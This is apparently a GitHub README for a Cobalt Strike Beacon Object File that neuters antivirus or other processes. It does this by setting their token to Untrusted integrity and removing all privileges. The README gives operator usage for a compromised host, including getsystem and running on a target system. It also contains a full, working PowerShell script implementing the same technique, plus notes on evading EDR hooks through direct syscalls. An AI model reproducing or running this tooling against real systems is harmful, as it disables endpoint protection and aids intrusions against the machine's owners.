RobertDiep/sandbox-process-bof
Sandbox AVs (or other processes)

This is a Beacon Object File (BOF) implementation, using direct syscalls, of the excellent process-sandboxing technique by Elastic's Gabriel Landau. Make sure to getsystem first in Cobalt Strike, or elevate your shell to SYSTEM before running the standalone build: the target's token can only be modified from a SYSTEM context.

Usage

Note: only x64 supported currently!

Load the CNA script in Cobalt Strike, then run sandbox-process <pid> in a Beacon that has SYSTEM privileges (easy using getsystem).

This sets the integrity level of the target process's primary token to Untrusted and strips all privileges from that token. The process keeps running, but Mandatory Integrity Control now denies it access to any object labelled above Untrusted, which is what makes it a "sandboxed" process.
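The same two token changes, written out against the documented Win32 API rather than direct syscalls, as an added example that is not the repository's code. It assumes an elevated SYSTEM PowerShell session, a script file name of sandbox-process.ps1, and that the target process allows PROCESS_QUERY_LIMITED_INFORMATION (the only process right OpenProcessToken needs). The class name Sandbox and all variable names are this example's own.

```powershell
# Added example, not the repository's BOF: sandbox a process by setting its
# token integrity level to Untrusted (S-1-16-0) and removing every privilege.
# Usage (from a SYSTEM shell):  .\sandbox-process.ps1 -ProcessId 1234
param([Parameter(Mandatory = $true)][int]$ProcessId)

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class Sandbox {
    public const uint PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;
    public const uint TOKEN_QUERY             = 0x0008;
    public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
    public const uint TOKEN_ADJUST_DEFAULT    = 0x0080;
    public const int  TokenPrivileges         = 3;    // TOKEN_INFORMATION_CLASS
    public const int  TokenIntegrityLevel     = 25;   // TOKEN_INFORMATION_CLASS
    public const uint SE_GROUP_INTEGRITY      = 0x00000020;
    public const int  SE_PRIVILEGE_REMOVED    = 0x00000004;

    // Same layout as TOKEN_MANDATORY_LABEL, whose only member is a SID_AND_ATTRIBUTES.
    [StructLayout(LayoutKind.Sequential)]
    public struct SID_AND_ATTRIBUTES { public IntPtr Sid; public uint Attributes; }

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool ConvertStringSidToSid(string sid, out IntPtr psid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool SetTokenInformation(IntPtr token, int cls, ref SID_AND_ATTRIBUTES info, int len);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool GetTokenInformation(IntPtr token, int cls, IntPtr info, int len, out int needed);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, IntPtr newState, int len, IntPtr prev, IntPtr retLen);
    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr h);
    [DllImport("kernel32.dll")]
    public static extern IntPtr LocalFree(IntPtr h);
}
'@

function Fail($what) {
    throw "$what failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
}

# Step 1: open the process with the minimal right and then its primary token.
$hProc = [Sandbox]::OpenProcess([Sandbox]::PROCESS_QUERY_LIMITED_INFORMATION, $false, $ProcessId)
if ($hProc -eq [IntPtr]::Zero) { Fail "OpenProcess($ProcessId)" }

$hTok = [IntPtr]::Zero
$access = [Sandbox]::TOKEN_QUERY -bor [Sandbox]::TOKEN_ADJUST_PRIVILEGES -bor [Sandbox]::TOKEN_ADJUST_DEFAULT
if (-not [Sandbox]::OpenProcessToken($hProc, $access, [ref]$hTok)) { Fail "OpenProcessToken" }

# Step 2: relabel the token to the Untrusted mandatory integrity level (S-1-16-0).
$pSid = [IntPtr]::Zero
if (-not [Sandbox]::ConvertStringSidToSid("S-1-16-0", [ref]$pSid)) { Fail "ConvertStringSidToSid" }
$label = New-Object Sandbox+SID_AND_ATTRIBUTES
$label.Sid = $pSid
$label.Attributes = [Sandbox]::SE_GROUP_INTEGRITY
$labelSize = [Runtime.InteropServices.Marshal]::SizeOf($label)
if (-not [Sandbox]::SetTokenInformation($hTok, [Sandbox]::TokenIntegrityLevel, [ref]$label, $labelSize)) {
    Fail "SetTokenInformation(TokenIntegrityLevel)"
}

# Step 3: read the token's privilege list, mark every entry SE_PRIVILEGE_REMOVED,
# and write it back. Removal (not just disabling) is what "strip" means here.
$needed = 0
[void][Sandbox]::GetTokenInformation($hTok, [Sandbox]::TokenPrivileges, [IntPtr]::Zero, 0, [ref]$needed)
$buf = [Runtime.InteropServices.Marshal]::AllocHGlobal($needed)
if (-not [Sandbox]::GetTokenInformation($hTok, [Sandbox]::TokenPrivileges, $buf, $needed, [ref]$needed)) {
    Fail "GetTokenInformation(TokenPrivileges)"
}
$count = [Runtime.InteropServices.Marshal]::ReadInt32($buf)        # TOKEN_PRIVILEGES.PrivilegeCount
for ($i = 0; $i -lt $count; $i++) {
    # Privileges[] starts at offset 4; each LUID_AND_ATTRIBUTES is 12 bytes
    # (8-byte LUID followed by a 4-byte Attributes field).
    [Runtime.InteropServices.Marshal]::WriteInt32($buf, 4 + ($i * 12) + 8, [Sandbox]::SE_PRIVILEGE_REMOVED)
}
if (-not [Sandbox]::AdjustTokenPrivileges($hTok, $false, $buf, $needed, [IntPtr]::Zero, [IntPtr]::Zero)) {
    Fail "AdjustTokenPrivileges"
}

[void][Runtime.InteropServices.Marshal]::FreeHGlobal($buf)
[void][Sandbox]::LocalFree($pSid)
[void][Sandbox]::CloseHandle($hTok)
[void][Sandbox]::CloseHandle($hProc)
Write-Output "PID $ProcessId: token set to Untrusted, $count privilege(s) removed"
```

Two practitioner notes on this version. First, it relabels and strips the primary token only; handles the process already holds were access-checked when they were opened and keep working, so the effect is that the process can no longer acquire anything new, not that existing work stops. Second, it walks the Win32 API through advapi32, so an EDR hooking those exports sees every call; the repository's direct-syscall BOF exists precisely to avoid that, and this script is for understanding and lab testing, not for replacing it.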

Building

Make sure mingw-w64 is installed and run make. The BOF will be written to the bin directory.

Running make test produces a standalone x64 executable that you can use for testing, or run directly on a target system when you are not operating through Beacon.

Credits

About

A Beacon Object File (BOF) to sandbox a process
